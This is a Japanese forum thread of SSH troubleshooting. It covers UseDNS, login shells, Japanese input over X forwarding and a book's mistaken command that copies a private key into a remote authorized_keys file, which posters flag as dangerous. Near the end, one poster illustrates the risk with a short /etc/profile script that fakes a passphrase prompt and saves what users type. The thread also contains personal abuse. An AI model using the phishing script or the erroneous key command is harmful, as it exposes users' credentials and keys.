SSH その8
逆引き出来ないクライアントから接続しているユーザーからの
「なんかログインに時間かかるんだけど」というクレームに
対応するため、逆引きをしないようにする機能だろ。 「それは逆引き設定しろ」と言えば済む話で、sshdの設定を変えるべきではない。 1ユーザーの逆引き無視要求で、全ユーザーの逆引きチェックを無効(危険)に晒すなんて、、 ごめん、言葉が足らなかった。
このUseDNS、デフォルトだとYesになっていると思うんだけど、クライアントが逆引き出来ない状態
(DNSサーバへの接続が出来ない状態やそもそもレコードにIPが登録されていない状態)でもSSHって接続出来るじゃない?
だとしたら、どういう時に使えるの?と思って。
1.IPアドレスがDNSに登録されている状態
かつ
2.そのホスト名を再度正引きしたら違うIPアドレスになっている
上みたいな状態の時だけは接続させないって認識であってるのかな?
レコードにいなかったり、DNSに接続出来ない時はそのままSSH接続出来るって事はわかるんだけど… rhosts認証を突破されないためのオプションだよ。 >>113
rhosts認証って、sshd_configのデフォルト設定だと有効になっていないよね?
てことは、sshd_configがデフォルトの状態のまま利用されていたら、このオプションでやってくれることってログの記録時にホスト名でロギングしてくれるくらいって
認識であっているかな?
他の何か利用用途ってあります? >>116
> 考えてもしょうがないからさっさとnoにしちゃえよ
インシデントになったせいで、会議で説明しなきゃならないんだよ 自分がやるべきことを掲示板に丸投げしてドヤ顔かよw ウソ教えられて、会議でそれを突っ込まれたら、2chで聞いたと言い訳するのかな? >>118
>>119
とはいっても、サポートよりここの住人の方が詳しいし頼りになるし…
教えてもらった情報を元に海外のサイトとサポートで裏取しようと思ってたんだ
仕様の部分がもうよくわからなくて… かまってもらえるのは回答者にとって興味がある場合だけ >>120
ホスト名で認証しない限りUseDNSはNoでいい。
今時IgnoreRhostsがnoになってることはないだろ。
デフォルトはrsh引きずってるだけ。 かまうと調子こいてソースは?とかエビデンスは?とか言い始めるぞw というわけで、このスレでのSSHに関する情報交換は全面禁止となりました。 ログインシェルをsshに変えたいんですが、chshでやろうとするとエラーになります。
どうすればいいですか? まずはその屏風からsshとかいうシェルを出してみてください sshはすでにインストール済みで、動作確認済みです >>127
>>129
出来ません、出来ません。
SSHにはそんなこと出来ません。 >>127
/etc/shellsにないんじゃないか。
ログインできなくなってもしらんけど。 /etc/shellsですか、ありがとうございます。
今環境がないので明日、客先で試してみます。 >>126
× このスレでのSSHに関する情報交換は全面禁止となりました
○ このスレでのSSHに関するサポート乞食は全面禁止となりました 132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…
sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。 UNIX板には死語レベルのコピペにマジレスするピュア()な中高年が多いですね SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの?
Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)
ターミナル または 、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。 >>139
この場合日本語入力はローカル側のが使われるんだよ。sshログイン先のホストのものではない。
必要な環境変数が設定されてないとエスパー。 >139-142
失礼しやした。
結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。
で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に 書くと、
今度は、sshが、 xauth を読まなくなる。
これについては、
SSHのマニュアルか
http://www.unixuser.org/~euske/doc/openssh/jman/sshd.html
個人ページ
http://namazu.org/~tsuchiya/ssh/
http://uncorrelated.no-ip.com/20101225.shtml
を参考に対処できそう。 自己レス
>>143
LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。
それから、
cygwin → LinuxMint へ ssh -X で リモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。
orz cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'
これだと秘密鍵をremotehostに持ち出すことになるよね?
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。 なんで秘密キーを公開キーのファイルに追記してんの?w >>146
公開鍵登録しろよ。多分id_rsa.pub >>147-149
川本安武とかいうバカが元凶のようだ。
http://books.google.co.jp/books?id=iUcoBQAAQBAJ&lpg=PR1&hl=ja&pg=PA35#v=onepage&q&f=false ~/はシェルに依存だから。
>>や;も意図したとおりに解釈してくれないかも知れないが。 ~/ を解釈しないシェルって何だ?
dashもbusyboxのshも解釈するぞ /bin/shがThompson ShellとかBourne ShellでOpenSSHが入ってる環境とか
無理やり作ろうとしても大変だなww うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか? ~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。 >>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。
お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば? >>150 = >>159 はここで作者disる暇あったらgihyoに本の回収絶版でも申請すれば? だから訂正でも謝罪でも訴訟でもなく作者の死を望んで何になるのよ とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった 新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
ttp://www.unixuser.org/~euske/doc/openssh/book/index.html
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない 間違った記述すると、瞬殺で特定されるとかgoogleさん怖すぎ。 >>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160=162=作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。 >>170
>>159は(川本かもしれない)>>158に「死ねば」と言った。
>>158が筆者であると断定できるのは>>158だけであるが、
お前は断定している。ゆえにお前が>>158であり川本本人。 で、お前はこのスレで川本死ね川本死ねと呪詛を吐くだけで
他に被害者が出ないようになんとかしようという気は全く無いわけだ
>>167にある連絡先にクレームはちゃんとつけたのか? >>172
当たり前だ。タダでデバッグしてやる義理は無い。 読者を危険に晒した!というほどのおおげさなことなん?
chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。
scpしてchmodする直前のスキをつくというのはナシね。
物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。 >>174
> rootが信頼できないならsshすること自体が危ないわけだし。
そうなの? どんな危険性が? >>174
> rootが信頼できないならsshすること自体が危ないわけだし。
別のサーバーも同じキーペアで認証してたら何が起こるか考えてみたまえ。 >>175
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん? >>176
いや、問題ないよね? 秘密鍵のフォワードとかしてなければ cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。
やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。 >>178
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。 >>179
まぁどいつもこいつもわかってて弄ってるだけなので…… >>180
ログイン先に秘密鍵おいておくとか頭煮えてるの? おだいじにね >>182
おれじゃなくて>>178に言え。痴呆症ジジイ。 >>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180>>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。
公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ… >>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。
クライアント側で何か実行とかできるのかと思った。 >>184
>>>180>>183
>問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。
誤読だバカ。
>>176,>>180,>>183は全部オレだ。
「sshすること自体が危ない」ではなく「rootが信頼できないなら」への指摘だ。
言いがかりをつけるなら、どっちを引用したのか良く考えてからつけることだ。 誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。
一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。 >>187
不安を煽るというか、秘密鍵を意図せずアップロードする行為はどう考えても普通に危ないわw
正誤表が出ても初心者の類がそんなん見に行くわけがないし正誤表が出ても推奨なぞできん。 IPAに届けた上で、技評のトップページで謝罪訂正するレベル >>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。 >>194
どこをどう読んだらそんな解釈になるんですか川本さん 悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね
# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi >>199
おはよう、川本君。IPAには届け出たかね? 川本が!川本が俺を殺しに来る!!
あいつのせいで俺の鍵が流出した!!!
川本許さねえ!絶対にゆるさねえええええええええええええええええええええ!!!!!!!!!11
これぐらいキレてもいいんだよきみ あけましておめでとう。
みんな、22 開けて使ってるの?
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。 fail2banしてるから22のままだなあ。
premitRootLogin noだしpassword認証も受け付けてないし。 22の方が便利ってわけでもないから変えてる
わざわざ余計なログ吐かせて眺める趣味もないし